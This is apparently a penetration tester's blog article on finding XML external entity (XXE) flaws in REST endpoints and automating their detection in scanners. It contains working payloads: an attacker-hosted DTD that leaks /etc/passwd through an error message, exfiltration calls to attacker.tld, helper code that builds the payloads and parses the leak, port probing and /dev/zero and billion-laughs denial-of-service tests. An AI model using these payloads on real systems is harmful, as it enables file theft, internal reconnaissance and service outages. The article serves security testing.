Reference link: https://www.christian-schneider.net/GenericXxeDetection.html

In this article I present some thoughts about generic detection of XML eXternal Entity (XXE) vulnerabilities during manual pentests supplemented with some level of automated testing. The ideas in this blog post (derived from experience with several typical and atypical XXE detections during blackbox pentests) can easily be transformed into a generic approach that fits into web vulnerability scanners and their extensions.

I demonstrate this with an example in which a service endpoint that is normally used in a non-XML fashion also turns out to accept XML as input format, opening up an attack surface for XXE.

At the time of writing this article I've started to develop a Burp Extension ("Generic XXE Detector") and will eventually also transform it into a ZAP extension, letting this kind of detection approach make its way into these scanners - if I find the time to complete that.

XXE detection in service endpoints

During blackbox pentesting one often encounters service endpoints (mostly REST-based ones called from single-page apps in the browser). These RESTful endpoints usually offer JSON as their transport format, but many server-side development frameworks (like JAX-RS for Java-based RESTful services) make it very easy for developers to also offer an XML-based data exchange format for input and/or output out of the box. If such alternative formats exist, they can easily be triggered with suitable Content-Type request header values (like text/xml or application/xml).

So the challenge is to find the endpoints that also accept XML as input format, even though the client (the web page) only uses JSON or direct path- or query-params to access the service. To scale this from a manual pentesting trick into something that can be automated, the scanning tool needs a generic XXE detection approach that can easily be applied to every URL the active scanner sees in its scope during a pentest.

In one very interesting case of an XXE finding inside a Java-based service endpoint (during a blackbox pentest), I came across an endpoint that took only path- and query-params as input and responded with JSON. It was even a simple GET-based service (no POST there), so it didn't really look like a case of "let's try some XXE Kung-Fu here...". In particular, the tools (including Burp) didn't find any XXE at this spot when actively scanning it, even with thorough scanning configured.

But after several manual tries, I managed to squeeze an XXE out of it, since it indeed was a REST service which also accepted XML out-of-the-box. I had to apply several tricks though, in order to get the XXE to work:

  • I tried to convert the request from a GET to a POST in order to also send XML as the request body. Unfortunately POST was not accepted (as the service was only mapped to GET), so I had to stick to GET requests.
  • I removed the query-params as well as path-params from the request URL in order to not let these get picked up by the service. As this was a blackbox pentest, I can only assume that removing the query-params led towards a mode of the service endpoint accepting the input also via other formats (i.e. when automatically mapped from XML input for example). Accessing the service without the used path- and query-params resulted in an error message (no input data available).
  • Even though only GET could be used, I then added the Content-Type: application/xml request header and some malformed XML as the request body. This was rewarded with an XML error message, showing that some kind of parsing process picked up the body of the GET request and making it an interesting target to investigate further. Adding the path- and query-params back to the request resulted in a business error message, so the exploit seems to require removing them, as they might otherwise take precedence over the XML body.
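The probing trick from the last bullet (a GET request carrying a malformed XML body, followed by a check for parser errors in the reply) could be sketched roughly as follows. This is only an illustration: the helper names, the malformed probe document and especially the list of error signatures are assumptions, not something taken from the original assessment, and a real scanner would need a much larger, tuned signature list.

```python
import re

# Illustrative signatures only (assumption): typical fragments of Java and
# Python XML parser error messages that may be echoed back by a server.
XML_ERROR_PATTERNS = [
    r"javax\.xml\.bind\.UnmarshalException",
    r"org\.xml\.sax\.SAXParseException",
    r"Content is not allowed in prolog",
    r"XML document structures must start and end within the same entity",
    r"XMLSyntaxError",
]

# Deliberately malformed XML: the elements are never closed.
MALFORMED_XML = '<?xml version="1.0" encoding="UTF-8"?><probe><unclosed>'


def build_probe_request(host: str, path: str) -> bytes:
    """Build a raw GET request that carries a malformed XML body."""
    body = MALFORMED_XML.encode("utf-8")
    head = (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Type: application/xml\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Connection: close\r\n"
        "\r\n"
    )
    return head.encode("ascii") + body


def looks_like_xml_parser_error(response_body: str) -> bool:
    """Return True if the response body matches one of the known signatures."""
    return any(re.search(p, response_body) for p in XML_ERROR_PATTERNS)
```

The request is assembled as raw bytes because many HTTP client libraries make it awkward to send a body with GET; the bytes can be written to a plain (TLS) socket instead.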

Now that I had a way of letting the server parse my XML and at least received replies with technical error messages from the parser, I tried to use the XXE to exfiltrate some data (like /etc/passwd or just a listing of the base directory /). As the expected XML format for this kind of service call was not known to me (blackbox assessment), I had to use a more generic approach that works even without placing the entity reference in the proper XML element. Also (as tested afterwards), when the server got the XML as expected, it didn't return any dynamic response, so only the technical error was echoed back. Of course, the great out-of-band (OOB) exfiltration technique by T. Yunusov and A. Osipov would work as a generic approach to exfiltrate content in such a scenario.

But since (at least for current Java environments) this kind of URL-based OOB exfiltration only allows exfiltrating the contents of files consisting of a single line (as CRLFs break the URL to the attacker's server), I combined it with the technical error message the server replied with and read the data from there:

  • The idea is to use the trick of passing the data carrying parameter entity itself into another file:/// entity in order to trigger a file-not-found exception on the second file access with the content of the first file as the name of the second file, which was thankfully echoed back completely from the server as a file-not-found exception (so pure OOB exfiltration wasn't required here):

Attacker's DTD part applying a file-not-found exception echo trick (hosted on attacker's server at http://attacker.tld/dtd-part):

<!ENTITY % three SYSTEM "file:///etc/passwd">
<!ENTITY % two "<!ENTITY &#37; four SYSTEM 'file:///%three;'>">

Request (exploiting the XXE like in the regular OOB technique by Yunusov & Osipov):

GET /service/ HTTP/1.1
Host: example.com:443
Content-Type: application/xml
Content-Length: 161

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY % one SYSTEM "http://attacker.tld/dtd-part" >
%one;
%two;
%four;
]>
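As a rough sketch, the DTD part and the request body shown above could be generated for an arbitrary target file like this. The function names are made up for illustration. Note that the inner percent sign of the nested declaration is written as the character reference &#37;, since XML does not allow a bare % inside an entity value unless it starts a parameter entity reference.

```python
def build_dtd_part(target_path: str) -> str:
    """DTD fragment to be hosted on the attacker's server.

    target_path is an absolute path on the target, e.g. "/etc/passwd".
    """
    return (
        # %three; reads the target file ...
        f'<!ENTITY % three SYSTEM "file://{target_path}">\n'
        # ... and %two; declares %four;, whose system identifier is the
        # file content, so resolving %four; raises a file-not-found error.
        "<!ENTITY % two \"<!ENTITY &#37; four SYSTEM 'file:///%three;'>\">\n"
    )


def build_request_body(dtd_url: str) -> str:
    """Request body that pulls in the hosted DTD part and triggers the error."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<!DOCTYPE test [\n"
        f'<!ENTITY % one SYSTEM "{dtd_url}" >\n'
        "%one;\n"
        "%two;\n"
        "%four;\n"
        "]>"
    )
```

Calling build_dtd_part("/etc/passwd") and build_request_body("http://attacker.tld/dtd-part") reproduces the two pieces used in this example.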

Response (delivering the data as file-not-found error message):

HTTP/1.1 400 Bad Request
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Length: 1851
Connection: close

javax.xml.bind.UnmarshalException
- with linked exception:
[java.io.FileNotFoundException: /root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
... ... ...
... ... ...
... ... ...
apache:x:54:54:Apache:/var/www:/sbin/nologin (No such file or directory)]
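Pulling the leaked file content back out of such an error response is a simple pattern match. The following is a minimal sketch, assuming the error text has exactly the shape shown above (a java.io.FileNotFoundException message ending in the Linux-specific "(No such file or directory)" suffix); other platforms and parsers will word this differently, and the function name is hypothetical.

```python
import re
from typing import Optional

# The leading "/" belongs to the file:/// URL, not to the leaked content.
LEAK_RE = re.compile(
    r"java\.io\.FileNotFoundException: /(.*?) \(No such file or directory\)",
    re.DOTALL,  # the leaked file usually spans several lines
)


def extract_leaked_content(response_body: str) -> Optional[str]:
    """Return the file content echoed in the error message, or None."""
    match = LEAK_RE.search(response_body)
    return match.group(1) if match else None
```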

Using this file-not-found exception echo trick to read the data not only solved the "one line only" exfiltration problem, it also lifted some restrictions that existed with XXE exploitations when used directly inside the XML elements: Contents of files that contain XML special meta chars (like < or >) would break the XML structure. This is no longer a problem with the above mentioned trick.

After all of that worked pretty well, I discovered that Ivan Novikov had recently blogged about some pure OOB techniques that exfiltrate data even under Java 1.7+ using the ftp:// scheme and a customized FTP server. This would have worked in the above-mentioned scenario as well, even when the server does not return technical error messages, as it is a pure OOB exfiltration trick.

As a small side note: this file-not-found exception echo trick might also be usable as an XSS in some cases, by trying to echo <script>alert(1)</script> as the filename. Technical error messages are often not properly escaped when echoed back, in contrast to regular output that reflects XML element input. But this XSS is rather difficult to exploit in real scenarios, since it is not easy (and, depending on the HTTP method, perhaps impossible) to trigger the required request from a victim's browser; in this example it would be a strange GET with a request body.

Automating this as a scanning approach

Finding such an XXE vulnerability in a service endpoint using only manual pentesting tricks (as the scanners didn't detect it) made me think of a generic approach that is capable of detecting such a vulnerability automatically. Basically the scanning technique should try this on every (in-scope) request it sees, even when the request in question does not contain any XML data (as in the scenario of the RESTful service above that used mainly JSON).

So here are the ideas I came up with (which I will also prototype as a Burp and/or ZAP extension soon). The scanner should perform the following steps on every request it is allowed to scan actively. This should be done in addition to any regular XXE detections the scanner already has in place. The following technique is just intended to detect scenarios like the above mentioned:

  1. Issue the request with its original path- and/or query-params, once with the HTTP POST method and once with its original HTTP method (even GET), and place a generic DTD-based payload in the request body that directly references the parameter entity, like the following: <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY % xxe SYSTEM "file:///some-non-existing.file" > %xxe; ]>. Don't forget to add the Content-Type: application/xml header to the request (and try text/xml as well).

    • If the response contains an error like the following (effectively echoing the filename back in some kind of file-not-found message), flag it as potential XXE: javax.xml.bind.UnmarshalException - with linked exception: [java.io.FileNotFoundException: /some-non-existing.file (No such file or directory)]
    • You can also compare the response content of the previous step of accessing a non-existing file with accessing a valid existing file like /etc/passwd. This might catch some differences between the error responses of non-existing files vs. existing files that do not contain valid content to place inside the DTD.
    • If it is also possible to echo something like <script>alert(1)</script> as the filename in the file-not-found exception message, flag it as XSS too, but as one that is difficult to exploit (and, depending on the HTTP method required, possibly impossible to exploit).
  2. If the steps above didn't trigger an XXE condition, try to remove the original request's query-params and try the above steps again. Finally try to strip each path-param as well (just in case the service is picking this up also and then does not try to access input from the XML body instead) and retry step one.
  3. If the steps above didn't trigger an XXE condition, try to use the well-known OOB techniques (see the referenced links above for more details regarding these cool tricks):
    • Use a payload like the following (still with the Content-Type header set to application/xml): <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY % xxe SYSTEM "http://attacker.tld/xxe/ReqNo" > %xxe; ]>, where ReqNo is replaced by a unique number for every request scanned. This unique number is required (when parsing the attacker's webserver logs) to correlate log entries with the scanned requests, which should then be flagged as XXE candidates. The best results would be gained if the scanner offers some kind of drop-in where, at the end of the pentesting assignment, the observed logs of the attacker's webserver can be handed to the scanning engine to be checked for matches against the issued OOB request numbers.
  4. If the steps above didn't trigger an XXE condition (possibly because the server cannot reach the attacker's webserver), try established DNS-based OOB exfiltration techniques, where part of the domain name contains the XXE request number ReqNo from the previous step, as in the following payload: <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY % xxe SYSTEM "http://ReqNo.xxe.attacker.tld" > %xxe; ]>. That way at least the DNS resolution of the attacker's domain via its DNS server can be used to trigger the XXE match, when the scanner parses the DNS server's logs after the pentest and correlates them with the scanned requests.
  5. If the steps above didn't trigger an XXE condition, we have to go completely blind and rely only on side channels like timing measurements. This could be done by checking various internally reachable ports while comparing the response time of the payload <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY % xxe SYSTEM "http://127.0.0.1:80" > %xxe; ]> with the response time of <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY % xxe SYSTEM "http://127.0.0.1:9876" > %xxe; ]>
    • Similar checks can be performed with file:/// URLs by accessing small vs. big files. A scanner that is allowed to take risks can try to measure the increase in response time when accessing /dev/zero as the file (possibly killing the thread on the server).
    • A risky scanner can also try to measure the processing time of nested (non-external) expansions, as in the "billion laughs attack".
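The payloads and request variants from the steps above can be generated mechanically. The sketch below is one possible way to do it, not the implementation of any existing scanner: all function names are hypothetical, attacker.tld is the placeholder domain used throughout this article, and the path-stripping heuristic (dropping trailing path segments one at a time and keeping a trailing slash) is an assumption, since a blackbox scanner cannot know which segments are path-params.

```python
from urllib.parse import urlsplit, urlunsplit

XML_DECL = '<?xml version="1.0" encoding="UTF-8"?>'
CONTENT_TYPES = ("application/xml", "text/xml")


def dtd_payload(system_url: str) -> str:
    """Self-contained payload: the entity is declared and used inside the DTD."""
    return (
        f'{XML_DECL} <!DOCTYPE test [ '
        f'<!ENTITY % xxe SYSTEM "{system_url}" > %xxe; ]>'
    )


def payloads_for(req_no: int, attacker_domain: str = "attacker.tld") -> dict:
    """Payloads for steps 1, 3, 4 and 5, keyed by a descriptive name."""
    return {
        "file_not_found": dtd_payload("file:///some-non-existing.file"),
        "oob_http": dtd_payload(f"http://{attacker_domain}/xxe/{req_no}"),
        "oob_dns": dtd_payload(f"http://{req_no}.xxe.{attacker_domain}"),
        "timing_port_80": dtd_payload("http://127.0.0.1:80"),
        "timing_port_9876": dtd_payload("http://127.0.0.1:9876"),
    }


def url_variants(url: str) -> list:
    """Step 2: original URL, then without query, then with fewer path segments."""
    parts = urlsplit(url)
    variants = [url]
    if parts.query:
        variants.append(urlunsplit((parts.scheme, parts.netloc, parts.path, "", "")))
    segments = [s for s in parts.path.split("/") if s]
    while len(segments) > 1:
        segments.pop()  # drop the last segment as a potential path-param
        path = "/" + "/".join(segments) + "/"
        variants.append(urlunsplit((parts.scheme, parts.netloc, path, "", "")))
    return variants


def probe_plan(method: str, url: str, req_no: int):
    """Yield (method, url, content_type, payload_name, body) tuples to send."""
    original = method.upper()
    methods = ["POST"] if original == "POST" else ["POST", original]
    for variant in url_variants(url):
        for http_method in methods:
            for content_type in CONTENT_TYPES:
                for name, body in payloads_for(req_no).items():
                    yield http_method, variant, content_type, name, body
```

For simplicity probe_plan enumerates every combination; a real scanner would follow the escalation order of the steps and stop as soon as one probe confirms the XXE.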

Note that in the above scenarios the concrete XML format does not need to be known to the scanner, so it can easily apply this scanning technique to requests even when they haven't used any XML during passive observation. All XML payloads are completely self-contained within the DTD section. The idea is to issue this kind of scan on every request to automatically identify places where service endpoints or the like can also be accessed using XML, as is the case with some RESTful development frameworks.

Some of the XML DTD payloads above (those using OOB requests to detect XXE, either by inspecting the attacker's webserver logs or by measuring timing differences) can even be shortened to a pure external DTD approach like this: <!DOCTYPE test SYSTEM "http://attacker.tld/xxe/ReqNo"> or <!DOCTYPE test SYSTEM "file:///dev/zero">. But the longer tests presented above give more confidence in the XXE finding, since the shorter version only validates that external DTDs can be loaded, not external entities.
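The log correlation needed for the OOB variants (matching ReqNo values found in the attacker's webserver or DNS logs against the requests that were scanned) might look roughly like the following. This is a sketch under assumptions: the function name is made up, the log lines are treated as plain text in no particular format, and the patterns are hard-wired to the /xxe/ReqNo path and the ReqNo.xxe.attacker.tld host name used in the payloads of this article.

```python
import re

# Matches the path used by the HTTP-based OOB payload.
HTTP_HIT_RE = re.compile(r"/xxe/(\d+)")
# Matches the host name used by the DNS-based OOB payload.
DNS_HIT_RE = re.compile(r"\b(\d+)\.xxe\.attacker\.tld\b", re.IGNORECASE)


def correlate(log_lines, issued):
    """Map log hits back to scanned requests.

    issued maps each ReqNo (int) to a description of the scanned request.
    Returns the subset of issued whose ReqNo shows up in the logs; these
    are the requests to flag as XXE candidates.
    """
    hits = {}
    for line in log_lines:
        for pattern in (HTTP_HIT_RE, DNS_HIT_RE):
            for number in pattern.findall(line):
                req_no = int(number)
                if req_no in issued:  # ignore numbers we never issued
                    hits[req_no] = issued[req_no]
    return hits
```

Keeping the issued numbers in a lookup table means unrelated traffic hitting the attacker's server does not produce false positives, as long as the numbers are not easily guessable by third parties.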

Conclusion

As a Pentester
Watch out for any service-like endpoints in the application under test and try to force them to accept XML, even when the application itself uses other input formats with these endpoints (like query- or path-params or JSON POST bodies). In the lucky case where the endpoint is also configured to accept XML, try to exploit this further as an XXE condition.
As a Scanner Vendor
Try to incorporate ideas like the steps presented in this article into your scanning engines, augmenting them with automated parsing of log files to ease generic XXE detection with OOB techniques, even when scanning large attack surfaces (and make the attacker's exfiltration URL configurable).
